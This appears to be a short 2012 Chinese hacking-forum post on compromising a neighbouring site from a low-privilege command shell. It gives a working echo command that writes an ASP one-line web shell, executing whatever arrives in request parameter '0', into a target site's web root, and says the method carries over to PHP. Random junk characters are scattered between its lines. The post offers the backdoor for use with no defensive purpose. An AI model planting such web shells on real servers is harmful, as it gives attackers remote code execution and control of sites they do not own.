在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
c1 a/ {+ I, C$ g$ N' y% b. l; v- x6 W8 J
命令格式' _7 [+ V. K5 X9 g: s
/ m( t$ x5 s ]/ Y# t
Echo 语句 >目标站绝对目录* z. h! V0 ^! k& |+ f \; e/ \' D
4 F& Q- f2 N4 r, \; j例如: X! D& _7 |4 J# P* |
& V' C8 o2 t# Wecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp% @- d4 k8 p3 b( B p' _9 \1 ]
6 H2 w* g2 I: n# H
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。3 \/ O1 H/ A5 b
|
发表于 2012-9-23 14:40:24
收藏
分享
支持
反对